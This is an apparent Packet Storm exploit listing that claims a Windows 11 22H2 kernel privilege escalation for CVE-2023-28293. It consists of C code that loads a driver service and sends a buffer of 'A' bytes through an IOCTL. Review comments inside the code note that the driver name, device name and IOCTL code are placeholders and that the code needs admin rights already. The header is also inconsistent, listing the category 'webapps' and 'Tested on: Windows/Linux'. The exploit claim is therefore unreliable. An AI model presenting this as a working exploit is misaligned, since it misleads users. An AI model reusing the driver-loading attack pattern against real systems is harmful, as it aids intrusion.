

Microsoft Windows 11 22h2 Kernel Privilege Escalation

Microsoft Windows 11 version 22h2 suffers from a kernel privilege escalation vulnerability.

Packet Storm
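// Exploit Title: Windows 11 22h2 - Kernel Privilege Elevation
// Date: 2023-06-20
// country: Iran
// Exploit Author: Amirhossein Bahramizadeh
// Category : webapps
// Vendor Homepage:
// Tested on: Windows/Linux
// CVE : CVE-2023-28293
//
// Review note: as written, this listing is a generic "register a driver
// service and send one IOCTL" skeleton. Nothing in it is specific to
// CVE-2023-28293: the driver file name, device name and IOCTL code are
// placeholders, and creating/starting a kernel-driver service through the
// SCM already requires an administrative token, so running it does not by
// itself elevate anything. For defenders the observable signals are the
// service installation (System event 7045 / Security event 4697 for a
// SERVICE_KERNEL_DRIVER) and the subsequent driver load, both of which
// existing driver-load and service-creation telemetry already covers.

#include <windows.h>
#include <stdio.h>
#include <string.h>

// The vulnerable driver file name
// NOTE(review): a bare file name is resolved by the SCM relative to the
// system driver directory, not the current directory — use a full path
// for a driver stored anywhere else (verify for the target build).
const char *driver_name = "vuln_driver.sys";

// The vulnerable driver device name
const char *device_name = "\\\\.\\VulnDriver";

// The IOCTL code to trigger the vulnerability
#define IOCTL_VULN_CODE 0x222003

// The buffer size for the IOCTL input/output data
#define IOCTL_BUFFER_SIZE 0x1000

// Service name used both when registering and when deleting the driver
// service; kept in one place so the two calls cannot drift apart.
#define DRIVER_SERVICE_NAME "\\Driver\\VulnDriver"

// Prototypes: the original called these from main() before defining them,
// which is an implicit function declaration (removed from the language in
// C99 and a hard error on current compilers). The explicit ANSI ("A")
// Win32 entry points are used throughout so the char* arguments compile
// regardless of whether UNICODE is defined.
static BOOL LoadDriver(LPCSTR driver_name, LPCSTR service_name);
static BOOL UnloadDriver(LPCSTR service_name);

/*
 * Register and start the driver service, open its device, send one IOCTL
 * with a 0x1000-byte buffer of 'A', dump whatever the driver wrote back,
 * then stop and delete the service again.
 *
 * Returns 0 on success, 1 on any failure. Every failure after the driver
 * was loaded still runs the cleanup path, so the handle is closed and the
 * service removed (the original left both behind on an IOCTL error).
 */
int main(void)
{
    int rc = 1;
    HANDLE device = INVALID_HANDLE_VALUE;
    DWORD bytes_returned = 0;
    char input_buffer[IOCTL_BUFFER_SIZE];
    // Zeroed so the dump below never reads bytes the driver did not write.
    char output_buffer[IOCTL_BUFFER_SIZE] = {0};

    // Load the vulnerable driver
    if (!LoadDriver(driver_name, DRIVER_SERVICE_NAME)) {
        // GetLastError() returns a DWORD (unsigned long): %lu, not %d.
        printf("Error loading vulnerable driver: %lu\n", GetLastError());
        return 1;
    }

    // Open the vulnerable driver device
    device = CreateFileA(device_name, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                         OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        printf("Error opening vulnerable driver device: %lu\n", GetLastError());
        goto cleanup;
    }

    // Fill the input buffer with data to trigger the vulnerability
    memset(input_buffer, 'A', IOCTL_BUFFER_SIZE);

    // Send the IOCTL to trigger the vulnerability
    if (!DeviceIoControl(device, IOCTL_VULN_CODE, input_buffer, IOCTL_BUFFER_SIZE,
                         output_buffer, IOCTL_BUFFER_SIZE, &bytes_returned, NULL)) {
        printf("Error sending IOCTL: %lu\n", GetLastError());
        goto cleanup;
    }

    // Print only the bytes the driver reported writing. The buffer is raw
    // driver output, not a NUL-terminated string, so the original
    // unbounded "%s" could read past whatever the driver filled in.
    if (bytes_returned > IOCTL_BUFFER_SIZE) {
        bytes_returned = IOCTL_BUFFER_SIZE;
    }
    printf("Output buffer (%lu bytes):\n", bytes_returned);
    for (DWORD i = 0; i < bytes_returned; i++) {
        printf("%02x%s", (unsigned char)output_buffer[i], (i % 16 == 15) ? "\n" : " ");
    }
    printf("\n");
    rc = 0;

cleanup:
    // Close the device handle before stopping the driver: an open handle
    // can keep the driver from unloading (the original did this in the
    // opposite order).
    if (device != INVALID_HANDLE_VALUE) {
        CloseHandle(device);
    }

    // Unload the vulnerable driver
    if (!UnloadDriver(DRIVER_SERVICE_NAME)) {
        printf("Error unloading vulnerable driver: %lu\n", GetLastError());
        rc = 1;
    }
    return rc;
}

/*
 * Register driver_name as a kernel-driver service called service_name and
 * start it.
 *
 * Returns TRUE on success. Returns FALSE on failure with GetLastError()
 * set to the failing call's error; the error is re-applied after handle
 * cleanup so CloseServiceHandle cannot clobber it. A service that already
 * exists is reused, and one that is already running counts as success.
 * Creating a service needs SC_MANAGER_ALL_ACCESS, i.e. an administrative
 * token.
 */
static BOOL LoadDriver(LPCSTR driver_name, LPCSTR service_name)
{
    BOOL ok = FALSE;
    DWORD error = ERROR_SUCCESS;
    SC_HANDLE service = NULL;

    // Open the Service Control Manager
    SC_HANDLE sc_manager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL) {
        return FALSE;
    }

    // Create the service
    service = CreateServiceA(sc_manager, service_name, service_name, SERVICE_ALL_ACCESS,
                             SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
                             driver_name, NULL, NULL, NULL, NULL, NULL);
    if (service == NULL) {
        error = GetLastError();
        if (error != ERROR_SERVICE_EXISTS) {
            goto out;
        }
        // The service already exists, so open it instead
        service = OpenServiceA(sc_manager, service_name, SERVICE_ALL_ACCESS);
        if (service == NULL) {
            error = GetLastError();
            goto out;
        }
    }

    // Start the service
    if (!StartServiceA(service, 0, NULL)) {
        error = GetLastError();
        if (error != ERROR_SERVICE_ALREADY_RUNNING) {
            goto out;
        }
    }
    ok = TRUE;

out:
    if (service != NULL) {
        CloseServiceHandle(service);
    }
    CloseServiceHandle(sc_manager);
    if (!ok) {
        SetLastError(error);
    }
    return ok;
}

/*
 * Stop and delete the driver service called service_name.
 *
 * Returns TRUE on success. Returns FALSE on failure with GetLastError()
 * set to the failing call's error (re-applied after handle cleanup). A
 * service that is not running is still deleted.
 */
static BOOL UnloadDriver(LPCSTR service_name)
{
    BOOL ok = FALSE;
    DWORD error = ERROR_SUCCESS;
    SC_HANDLE service = NULL;
    SERVICE_STATUS status = {0};

    // Open the Service Control Manager
    SC_HANDLE sc_manager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    if (sc_manager == NULL) {
        return FALSE;
    }

    // Open the service
    service = OpenServiceA(sc_manager, service_name, SERVICE_ALL_ACCESS);
    if (service == NULL) {
        error = GetLastError();
        goto out;
    }

    // Stop the service
    if (!ControlService(service, SERVICE_CONTROL_STOP, &status)) {
        error = GetLastError();
        if (error != ERROR_SERVICE_NOT_ACTIVE) {
            goto out;
        }
    }

    // Delete the service
    if (!DeleteService(service)) {
        error = GetLastError();
        goto out;
    }
    ok = TRUE;

out:
    if (service != NULL) {
        CloseServiceHandle(service);
    }
    CloseServiceHandle(sc_manager);
    if (!ok) {
        SetLastError(error);
    }
    return ok;
}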

CVE-2023-28293

Windows Kernel Elevation of Privilege Vulnerability
